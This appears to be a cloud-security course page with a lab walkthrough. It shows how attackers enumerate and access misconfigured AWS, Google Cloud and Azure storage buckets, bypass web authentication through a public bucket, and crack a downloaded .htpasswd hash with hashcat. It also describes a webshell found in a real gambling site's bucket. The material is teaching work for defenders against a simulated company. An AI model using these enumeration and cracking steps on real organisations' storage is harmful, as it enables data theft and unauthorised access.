Cloud Spotlight: Insecure Storage

Cloud storage services like AWS S3, Google Cloud buckets, and Azure Blob are crucial for cloud apps. However, they can be major security risks, exposing sensitive data and affecting companies of all sizes, including Netflix, TD Bank, Ford, Walmart, and Capital One.

Early on, cloud storage like AWS S3 was set to public access by default, which led to many data breaches as attackers found unprotected buckets. Now, cloud providers default to restricting access, requiring admins to explicitly allow public access. However, insecure storage services are still common, with sensitive data often left exposed and vulnerable.

AWS S3 Bucket Configuration

Creating a storage bucket is similar across AWS, Google Cloud, and Azure. For AWS, you create an S3 bucket (like falsimentis-media) in the default region. By default, public access is blocked, but the AWS admin can change this to allow public access.

Many storage buckets are left unprotected and public because administrators may not fully understand the risks of removing security, misuse of access control lists (ACLs), or they start as public but later get private data.

Cloud Storage Access

Cloud storage providers offer HTTP access for easy cloud app integration. Each major provider (AWS, Google Cloud, Azure) has its own access URL. For Microsoft Azure, accessing storage Blobs requires an account name and container name, which can be the same.

An attacker can find cloud storage by visiting the URL and guessing the bucket or container name. There are tools that make this process faster and easier.

For AWS S3 buckets, we can access them using the URL or by using BUCKETNAME.s3.amazonaws.com. Both ways work the same, so you can use either to view or access the bucket.

Storage Scanning: AWS S3

If something is unclear, check the lab solution for a detailed explanation.

Bucket Finder by Robin Wood is a tool for checking AWS S3 buckets. It uses a list of bucket names to see if they exist and if they are public. We can also use it with the --download option to download all content from public buckets, but be careful as this can result in a lot of data being downloaded.

$ cat words
microsoft
sans-dev
joshsprivatestuff

$ bucket_finder.rb words --download
Bucket found but access denied: microsoft
Bucket does not exist: sans-dev
Bucket Found: joshsprivatestuff (
http://s3.amazonaws.com/joshsprivatestuff ) <Downloaded>
http://s3.amazonaws.com/joshsprivatestuff/01%20Infant%20Selachii.wav

The example shows that the wordlist file has three lines. Bucket Finder will check each name from this list at the HTTP endpoint (like http://s3.amazonaws.com/microsoft) and report if the bucket exists, is denied access, or is publicly available. Users need to create their own wordlist. Bucket Finder can be downloaded from https://digi.ninja/projects/bucket_finder.php.

Storage Scanning: Google Cloud Bucket

GCPBucketBrute scans Google Cloud buckets to find them and check their permissions if allowed. It can use a wordlist to find buckets like Bucket Finder or use a GCP credential (or none with -u) to look at permissions. It also lets you use a keyword with common suffixes to find buckets.

$ gcpbucketbrute.py -u -k falsimentis
Generated 1216 bucket permutations.
UNAUTHENTICATED ACCESS ALLOWED: falsimentis-dev
- UNAUTHENTICATED LISTABLE (storage.objects.list)
- UNAUTHENTICATED READABLE (storage.objects.get)

$ gsutil ls gs://falsimentis-dev
gs://falsimentis-dev/01 Toddler Selachimorpha.wav

GCPBucketBrute found a publicly accessible GCP bucket named falsimentis-dev with list and get permissions for anyone. It can't list or download contents, but we can use the gsutil tool from Google for that. GCPBucketBrute, made by Spencer Gietzen from Rhino Security Labs, is available at GitHub.

Azure Scanning: Basic Blob Finder

Basic Blob Finder is a tool for scanning and finding Azure Blobs, similar to Bucket Finder. It uses a list of strings where each entry can either be a combined account and container name or separated by a colon to specify the account and container names individually.

$ cat namelist
falsimentis
falsimentis:falsimentis-container
falsimentis:falsimentis-container2
invalidacct:nosuchcontainer

$ basicblobfinder.py namelist
Valid storage account and container name: falsimentis:falsimentis-container
Blob data objects:
    https://falsimentis.blob.core.windows.net/falsimentis-container/01Newborn Euselachii.wav

Basic Blob Finder finds public Azure Blobs and lists their files. For example, it can find an account and container named falsimentis and falsimentis-container, respectively, and list a WAV file inside. You can get it from this link.

What's the Big Deal? A Walkthrough

To show the risk of unprotected buckets, consider this example: I used the top 10,000 websites and their subdomains as bucket names (e.g., microsoft.com becomes microsoft, cnn.com becomes cnn, etc.) and used a tool to search for these bucket names on Google Cloud. The scan took about 60 hours to check 1,216 possible names for each keyword.

The scan found 2,951 publicly accessible buckets, about 30% of the total. Out of these, 64 were badly misconfigured, letting anyone change bucket permissions. For example, one bucket had full permissions like setting policies, listing, getting, creating, deleting, and updating. Many unprotected buckets were easily found, and attackers could exploit these vulnerabilities further.

The (redacted) bucket can be listed, so an attacker can see and download all its files. Most public buckets only have this risk, meaning they expose information. However, this bucket also lets attackers upload files.

I used gsutil to list the files in the bucket and found hundreds, showing it's used for an online gambling site to share images and JavaScript. Among the files, I found JSP scripts like FxCodeShell.jsp, a server-side language. The script was added in 2019.

The FxCodeShell.jsp script is a webshell that lets an attacker log in and run commands on the web server. The web server runs the script, not the cloud storage server, though it likely syncs files with the cloud.

The older date stamp in the GCP bucket shows that the attacker found a vulnerability allowing file uploads. Visiting the site using the bucket and accessing FxCodeShell.jsp returned a response of "2," indicating the server runs Linux, which is confirmed in the source code.

$ sed -n 10,12p FxCodeShell.jsp     # -n 10,12p prints lines 10-12
String DEFAULT = "0";
String WINDOWS = "1";
String LINUX = "2";

An attacker can use malicious code to download and run any executable on the web server by entering a backdoor password in the view= argument and a malicious URL in the address= argument. It's unclear how the backdoor was deployed or exploited without more details. The attacker may have found a writable bucket with setIamPolicy access and used it to gain code execution on the server. The website with the backdoor and insecure bucket hasn’t responded to breach reports yet.

Bucket Discovery: Creative Name Selection

Attackers can find insecure buckets by using bucket discovery tools and a wordlist for scanning. While default wordlists like Daniel Miessler's SecLists are available, discovering new buckets often requires using creative naming ideas.

For example, if an attacker is targeting a company like Falsimentis Corporation to find unprotected buckets, they would consider all possible abbreviations and variations of the company name. They would also add common prefixes and suffixes, similar to what a cloud admin might use. While tools like GCPBucketBrute can do some of this automatically, it's best for an analyst to use OSINT resources and think like a cloud admin when searching for unsecured buckets.

DNS Logs, HTTP Proxy, Network Logs

Defenders can use logging tools to spot hostname or URL patterns linked to cloud storage services. This can include DNS logs (for Azure Blobs and some S3 buckets), HTTP proxy logs (AWS, Azure, Google), and network packet data. Google Cloud Buckets don't have unique DNS names, so they won't appear in DNS logs.

Most cloud storage tools use TLS encryption for HTTP traffic, but they still reveal the server name in the HTTP Server Name Indication (SNI) field. This can help identify the cloud provider and bucket name, like Azure Blobs or some S3 services.

The Need for Cloud Storage Logging

If your organization uses cloud storage, you need to set up logging for it. Many cloud providers don’t enable this by default, so the cloud admin must specify a separate bucket for logging access. Without these logs, it’s hard to know who accessed the data and what they did with it. This is crucial for both public and access-controlled storage to understand the impact of any unauthorized access.

Cloud storage logs work with many SIEM tools and Elastic Stack via the Filebeat module. For a simpler approach, logs can be downloaded locally and converted to a spreadsheet format using Rob Clarke’s s3logparse (https://pypi.org/project/s3-log-parse/). The example shows creating a temporary directory for S3 logs, copying logs from the sec504-erk-logging bucket, and converting them to a tab-separated values file.

$ mkdir s3logs; cd s3logs
$ aws s3 sync --exclude="*" --include="*" s3://sec504-erk-logging/ .
$ cat * | s3logparse > s3logs.tsv

Lab 3.4: Cloud Bucket Discovery

In this lab, we will use the simulated cloud environment to identify and assess the threat of miscongured cloud storage buckets.

In this lab, we will use our Slingshot Linux VM to attack a simulated AWS S3 cloud storage bucket service. We will use different techniques to identify the presence of cloud storage bucket services, interacting with these endpoints to enumerate access and access sensitive data disclosed in the cloud service.

From the Slingshot Linux terminal, let's run gos3 to launch the simulated cloud environment.

gos3

Slingshot Linux has been preconfigured with simulated AWS credentials. We cna find the file at ~/.aws/credentials.

cat .aws/credentials

Let's see how to use the AWS command line tool aws for S3 services. It lets you work with S3 buckets like you do with local files. With aws s3, you can create buckets (mb), list files (ls), copy files (cp), move files (mv), and more.

First, let's create a new bucket called mybucket.

aws s3 mb s3://mybucket

Let's break down the command:

aws : Run the AWS command line tool
s3 : Tell the AWS command line tool to interact with S3 cloud storage bucket services
mb : Run the make bucket S3 operation
s3://mybucket: Use the S3 URI prefix s3:// with the bucket name mybucket to create the bucket.

When we run the command, we get an error saying the bucket mybucket already exists. This shows that bucket names in cloud storage must be unique across all users. We can't have two buckets with the same name, even if they're owned by different people; all S3 bucket names must be unique globally.

Let's rerun the ame command and change the name to mybucket2.

aws s3 mb s3://mybucket2

We can create the bucket mybucket2 because no one else has used that name yet. The first person to create it gets the name.

Next, let's upload a file to the new S3 bucket. First, let's make a text file by saving the output of ps -ef to a file named pslist.txt.

ps -ef > pslist.txt

We don't care about the file's contents; we just need a file to copy to the S3 bucket.

Next, let's copy the file from the local file system to the S3 bucket.

aws s3 cp pslist.txt s3://mybucket2/

We added a trailing slash / to the destination URI, which isn’t needed because the copy process will add it automatically. However, it shows that the target S3 URI can just be a bucket name or a full path. For example, using s3://mybucket2/dir1/dir2/pslist.txt will let S3 create the necessary directories for us.

Next, let's list the bucket to see the copied file.

aws s3 ls s3://mybucket2

Next, we'll apply what we've learned to evaluate the S3 buckets used by Falsimentis Corporation.

Let's navigate to the Falsimentis website at http://www.falsimentis.com.

Let's click on the About link, find the Meet Our CEO section, and hover over the Download Company Profile button.

Notice that the link to the company profile has a different URL: http://www.falsimentis.com.s3.amazonaws.com/company-prole.pdf

Many websites use cloud storage buckets to host or distribute static files. For AWS, we can set up a bucket so that it's publicly accessible via a URL like bucketname.s3.amazonaws.com. For example, the website www.falsimentis.com is hosted on an S3 bucket at www.falsimentis.com.s3.amazonaws.com.

Since we found an S3 bucket for the Falsimentis website, we can try accessing it with the AWS command line tool.

aws s3 ls s3://www.falsimentis.com

The AWS command line tool shows that the www.falsimentis.com bucket is set to public access. This might seem obvious because the bucket hosts the company's website (as seen with index.html and other web files). However, using the S3 service to access the bucket can reveal extra files and access not visible from just browsing the website.

The output shows multiple directories, including one called "protected". Let's check that directory.

When we try to access www.falsimentis.com/protected, it asks for a username and password. This means the admin is protecting the server with authentication. However, our S3 access via the AWS command line doesn't use this same authentication, so we can bypass it.

aws s3 ls s3://www.falsimentis.com/protected/

Here, we see the protected directory contents, which include the .htpasswd file (storing usernames and passwords for website access) and a JSON file named sales-status.json.

We can access these files because we bypass the web server's authentication by directly accessing the public S3 bucket where the files are stored.

Next, let's use the sync command to download the contents of the /protected directory from the web server.

// Some code

We have retrieved the protected files from the www.falsimentis.com web server, bypassing the HTTP authentication requirement.

In the www.falsimentis.com example, we found the S3 bucket through a PDF link on the site. Attackers can also guess bucket names to find them. In the rest of the lab, we'll use the bucket_finder tool by RobinWood to find both public and private S3 buckets. This method also works for Azure Blob storage and Google Compute Buckets with the right discovery tools.

An attacker uses a tool to guess bucket names by trying a list of names. The tool checks if the name is a real bucket and also looks at the bucket's security.

First, let's display the contents of the ~/labs/s3/shortlist.txt le

cat labs/s3/shortlist.txt

This file has three bucket names: mybucket (which we know exists), mybucket2 (the one you created), and sans (whose existence we’re unsure of). Let's run the bucket_finder.rb script with this list of buckets as the only argument, like this.

bucket_finder.rb labs/s3/shortlist.txt

The tool correctly showed that "mybucket" and "mybucket2" exist, but "sans" does not.

Bucket_finder shows that mybucket2 gives an "access denied" error when listing its files. This is important: bucket discovery tools don't use your account's permissions to find buckets. They only check public access to see if buckets exist and try to get data from ones that are accessible.

Run the attack again with bucket_finder using a longer bucket names list from ~/labs/s3/bucketlist.txt, saving the results to a file called bucketlist1-output.txt using the tee command.

bucket_finder.rb labs/s3/bucketlist.txt | tee bucketlist1-output.txt

When using the bucket_finder tool, we might frequently see "Bucket does not exist: ...". The tool checks many buckets, so it’s easy to overlook when it finds a real bucket.

To remove messages about unidentified buckets, let's use grep on the bucketlist1s.txt file as shown.

grep -v "does not exist" bucketlist1-output.txt

Filtering out lines that say "does not exist" gives us clearer results. We find 5 new S3 buckets: 4 are private, but the "movies" bucket is public. Using Bucket_finder, we can see the files in this public bucket, including "movies.json".

For cloud bucket discovery, an attacker can use a list of potential bucket names to find those that exist and are publicly accessible. However, this approach is not targeted, meaning the buckets found may not belong to Falsimentis Corporation. To focus on Falsimentis, we need to generate a tailored list of bucket names for more accurate results.

To make a custom list of bucket names, we'll use the company name (falsimentis) as the start and add common bucket endings to it.

awk '{print "falsimentis-" $1}' labs/s3/permutations.txt > bucketlist2.txt

Let's repeat the bucket_finder attack using the bucketlist2.txt file this time.

bucket_finder.rb bucketlist2.txt | tee bucketlist2-output.txt

Let's remove the messages about unidentified buckets.

grep -v "does not exist" bucketlist2-output.txt

We've found a new bucket, probably used by Falsimentis, called falsimentis-eng. It's also protected, so we can't access it.

Next, we'll use CeWL to create a custom wordlist by crawling a website.

opt/cewl/cewl.rb -m 2 -w cewl-output.txt http://www.falsimentis.com

Amazon S3 bucket names can only include lowercase letters, numbers, dots, or hyphens. To use a CeWL wordlist, let's convert all uppercase letters to lowercase with the tr command.

cat cewl-output.txt | tr [:upper:] [:lower:] > cewl-wordlist.txt

Now, let's make a custom bucket name list with CeWL suffixes using the Awk command, as shown.

awk '{print "falsimentis-" $1}' cewl-wordlist.txt > bucketlist3.txt

Let's repeat the bucket_finder attack again, but using the bucketlist3.txt file this time.

bucket_finder.rb bucketlist3.txt | tee bucketlist3-output.txt

Let's exclude the lines that contain the string "does not exist".

grep -v "does not exist" bucketlist3-output.txt

With the third bucket list from CeWL, we found a new bucket called falsimentis-ai containing several images. These files are publicly available, so we can download them using the AWS command line tool or view them in Firefox using the provided URLs.

In this lab, we learned how attackers find insecure cloud storage buckets. Since each bucket name must be unique, attackers can guess names and check their access. Tools like bucket_finder and the AWS CLI make this easy. The challenge is creating a list of names to guess. Attackers can use clues from the target organization, like cloud service links or metadata, to build this list. After finding a bucket, they use the AWS CLI to check if it’s public and writable.

As defenders, we need to know these ideas to spot risky cloud storage in our own companies and create policies to protect sensitive data.

Bonus

We used Awk commands to create bucket lists with "falsimentis-" as a prefix and CeWL keywords. Bucket names might have the company name and a hyphen, or they might use different separators like dots or none at all (AWS S3 buckets can use various separators).

Think about creating a new list of bucket names by combining CeWL data with prefixes, suffixes, and different separators.

1) What is the yet-undiscovered Falsimentis bucket name disclosing several images?

awk '{print "falsimentis." $1}' cewl-wordlist.txt >> bucketlist4.txt
awk '{print "falsimentis" $1}' cewl-wordlist.txt >> bucketlist4.txt
awk '{print $1 "-falsimentis"}' cewl-wordlist.txt >> bucketlist4.txt
awk '{print $1 ".falsimentis"}' cewl-wordlist.txt >> bucketlist4.txt
awk '{print $1 "falsimentis"}' cewl-wordlist.txt >> bucketlist4.txt

Let's use the bucketlist4.txt file to identify any new Falsimentis buckets.

bucket_finder.rb bucketlist4.txt | tee bucketlist4-output.txt
grep -v "does not exist" bucketlist4-output.txt

Answer: cats-falsimentis

2) Of all the identified buckets, which ones are writable?

A cloud storage bucket might allow anyone to write to it, regardless of other settings. To check if we can write to it, first see if the bucket exists with bucket_finder, then try copying a file to it using the AWS command line tool.

aws s3 cp pslist.txt s3://movies/

The copy fails because the bucket is not writable. We can use this approach with other buckets too. Let’s use the AWS tool to copy to the other buckets we found in this lab.

aws s3 cp pslist.txt s3://certificates
aws s3 cp pslist.txt s3://dev
aws s3 cp pslist.txt s3://prod
aws s3 cp pslist.txt s3://falsimentis-eng
aws s3 cp pslist.txt s3://falsimentis-ai
aws s3 cp pslist.txt s3://www.falsimentis.com/

Answer: www.falsimentis.com

3) Identify one final publicly-accessible Falsimentis bucket that discloses customer data. How many customer records are disclosed in the Falsimentis customer data bucket?

We can find the final Falsimentis bucket in a few ways. The hint says it’s a customer data bucket, so think of names with "cust" or "customer" in them. We can also use Awk to create a new list of bucket names by mixing prefixes and suffixes from the original bucketlist.txt.

awk '{print "falsimentis-" $1}' ~/labs/s3/bucketlist.txt >> bucketlist5.txt
awk '{print "falsimentis." $1}' ~/labs/s3/bucketlist.txt >> bucketlist5.txt
awk '{print "falsimentis" $1}' ~/labs/s3/bucketlist.txt >> bucketlist5.txt
awk '{print $1 "-falsimentis"}' ~/labs/s3/bucketlist.txt >> bucketlist5.txt
awk '{print $1 ".falsimentis"}' ~/labs/s3/bucketlist.txt >> bucketlist5.txt
awk '{print $1 "falsimentis"}' ~/labs/s3/bucketlist.txt >> bucketlist5.txt

Let's use the new bucket list to find the Falsimentis customer bucket.

bucket_finder.rb bucketlist5.txt | tee bucketlist5-output.txt
grep -v "does not exist" bucketlist5-output.txt

The Bucket_finder shows the bucket contains one file called customer-pipeline-Q3.json. Let's use the AWS command line tool to get the file.

aws s3 cp s3://falsimentis-cust/customer- pipeline-Q3.json .

The customer-pipeline-Q3.json file contains a list of JSON records, all formatted in a single line of text.

JSON files are often in one line because they don't require line breaks. Using cat will show the data as one long line, making it hard to read. Instead, we can use jq to view and understand the data structure more easily.

jq "." customer-pipeline-Q3.json | head

By using JQ to check the data format, we find that the JSON file is a list of customer records. With JQ, we can count how many records are in the list using the length function.

jq "length" customer-pipeline-Q3.json

Answer: 421

4) We found that the /protected folder on the www.falsimentis.com site revealed a JSON file and a .htpasswd file. The .htpasswd file contains a password hash used to control access to the /protected section of the website.

What is the username and plaintext password that grants access to www.falsimentis.com/protected?

Let's examine the password hash information using cat.

cat protected/.htpasswd

The username is lwatsham, and then there's a password hash. The dollar sign separates the parts of the hash, like in a Linux /etc/shadow file. Here, apr1 is the hash type, KYxkC7nP is the salt, and EcuHm3.iStKpM6P8ix0DN1 is the password hash.

The apr1 identifier is for Apache HTTP digest authentication files. It uses MD5 with 1000 iterations to make password cracking harder.

Let's use the --identify option to find out the Hashcat mode for Apache HTTP digest authentication hashes.

hashcat --identify protected/.htpasswd
hashcat --identify --user protected/.htpasswd

When using Hashcat, make sure the hash is on its own line, including hash type and salt. If we run Hashcat with the .htpasswd file as it is, we'll get an error.

hashcat -a 0 ~/protected/.htpasswd /usr/share/wordlists/passwords.txt

The "no hash-mode matches" error happens because the username is before the password hash. Let's use the --user option in Hashcat to indicate that the username comes before the password hash.

hashcat -a 0 --user ~/protected/.htpasswd /usr/share/wordlists/passwords.txt

Answer: hoera1991

Last updated 11 months ago